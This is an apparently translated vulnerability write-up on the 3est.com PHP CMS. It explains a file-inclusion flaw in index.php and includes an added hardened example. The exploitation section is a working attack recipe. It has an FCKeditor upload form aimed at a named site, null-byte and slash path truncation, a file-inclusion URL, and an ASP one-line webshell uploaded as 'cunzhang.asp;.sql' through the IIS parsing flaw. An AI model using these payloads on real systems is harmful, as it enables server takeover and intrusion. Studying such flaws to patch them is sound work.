# www.3est.com
# Author: village chief
# Release Date: 2011-04-21
Vulnerability Analysis:
/index.php source code:
```php
/*--------------*/
/* unrelated code omitted */
/*--------------*/
$_REQUEST = cleanArrayForMysql($_REQUEST);
$_GET     = cleanArrayForMysql($_GET);
$_POST    = cleanArrayForMysql($_POST);
$request  = $_REQUEST;
// The above only applies MySQL string escaping, which does nothing against ../
/*--------------*/
/* unrelated code omitted */
/*--------------*/
$request['m']     = !isset($request['m']) ? '' : $request['m']; // m is not filtered
$params['model']  = empty($request['m']) ? $menu_arr['type'] : $request['m'];
$request['a']     = !isset($request['a']) ? '' : $request['a']; // a is not filtered
$params['action'] = empty($request['a']) ? 'index' : $request['a'];
/*--------------*/
/* unrelated code omitted */
/*--------------*/
function layout_part($style = '')
{
    global $params, $request;
    // If this upgrade affects SQL execution in parts, manually comment out the body of destorydb(); do not delete it.
    destorydb();
    if (!empty($style)) $style = '_' . $style;
    $part_path = ABSPATH . '/skins/' . STYLENAME . '/parts/' . $params['model'] . '_' . $params['action'] . $style . '.php'; // path built from the m and a parameters
    $content_part_path = ABSPATH . '/content/' . $params['model'] . '/parts_' . $params['action'] . '.php'; // path built from the m and a parameters
    if (is_file($part_path)) {
        require_once($part_path); // file inclusion vulnerability, BY: village chief
    } elseif (is_file($content_part_path)) {
        require_once($content_part_path); // file inclusion vulnerability, BY: village chief
    } else {
        echo $part_path;          // echoes server-side paths to the client
        echo $content_part_path;
        echo '<span style="color: RED"><strong>The column or channel of the information you selected may have been deleted or does not exist. Check whether the column or channel and the topic of the information exist!</strong></span>';
    }
    // If this upgrade affects SQL execution in parts, manually comment out the body of recoverdb(); do not delete it.
    recoverdb();
    isComments();
}
```
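As an added example (not code from the 3est.com source), the same routing with the m and a parameters restricted to a whitelist and each include path checked to stay inside the skins or content directory; ABSPATH, STYLENAME, $menu_arr, destorydb(), recoverdb() and isComments() are the page's own names, the rest is assumed (PHP 7+):

```php
<?php
// Added example, not code from the 3est.com source: a hardened version of the
// m / a handling and layout_part() above. ABSPATH, STYLENAME, $menu_arr,
// destorydb(), recoverdb() and isComments() come from the page; the whitelist
// and the realpath() containment check are the additions (PHP 7+ assumed).
// Module/action names must be plain identifiers: no '/', '.', NUL or "%00".
function safe_name($value, $default)
{
    return (is_string($value) && preg_match('/^[A-Za-z0-9_]{1,32}$/', $value))
        ? $value : $default;
}
// Replaces the unfiltered $request['m'] / $request['a'] assignments.
$params['model']  = safe_name($request['m'] ?? null, $menu_arr['type']);
$params['action'] = safe_name($request['a'] ?? null, 'index');

// Return the candidate only if it is a real file inside $base
// (realpath() collapses ../ and symlinks before the prefix check).
function contained_file($base, $candidate)
{
    $real_base = realpath($base);
    $real_file = realpath($candidate);
    if ($real_base === false || $real_file === false || !is_file($real_file)) {
        return null;
    }
    // Compare with a trailing separator so /skins_x does not pass for /skins.
    $prefix = $real_base . DIRECTORY_SEPARATOR;
    return strncmp($real_file, $prefix, strlen($prefix)) === 0 ? $real_file : null;
}
function layout_part($style = '')
{
    global $params, $request;
    destorydb();
    $style       = (safe_name($style, '') === '') ? '' : '_' . $style;
    $skins_dir   = ABSPATH . '/skins/' . STYLENAME . '/parts';
    $content_dir = ABSPATH . '/content/' . $params['model'];
    $part_path = contained_file($skins_dir,
        $skins_dir . '/' . $params['model'] . '_' . $params['action'] . $style . '.php');
    $content_part_path = contained_file($content_dir,
        $content_dir . '/parts_' . $params['action'] . '.php');
    if ($part_path !== null) {
        require_once $part_path;
    } elseif ($content_part_path !== null) {
        require_once $content_part_path;
    } else {  // do not echo the attempted paths back to the client
        echo '<span style="color: RED"><strong>The selected column or channel may have been deleted or does not exist.</strong></span>';
    }
    recoverdb();
    isComments();
}
```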
Vulnerability exploitation (front-end GETSHELL):
Under IIS, or some Apache versions, PHP path handling can be truncated, for example with ///// or %00.
1. First upload an image-format file carrying the PHP code. Copy the following upload form source as cun.html:
```html
<form id="frmUpload" enctype="multipart/form-data"
      action="http://www.bkjia.com/editor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
```
2. Assume the uploaded image path /upload/Media/cunzhang.gif is obtained (FCKeditor is used; in testing the upload rewrites "." to "_", so FCKeditor cannot directly upload files such as 1.asp;.jpg).
3. Directly enter the address: /Article/previusfile/Article/201104/20110422101239144.gif%00
Or enter http://www.bkjia.com/?m=../upload/Me... // (several)
That is the front-end method. Now the back-end way to get a SHELL, for friends who cannot use the inclusion but can get into the back end.
Back-end GETSHELL:
Click => Database management => Database recovery => Browse and upload
Upload a file named cunzhang.asp;.sql whose content is <% Y = request("cun") %><% execute(Y) %>
Obtain the address http://www.bkjia.com/temp/data/cunzhang.asp;.sql (via the IIS parsing vulnerability, this is the SHELL)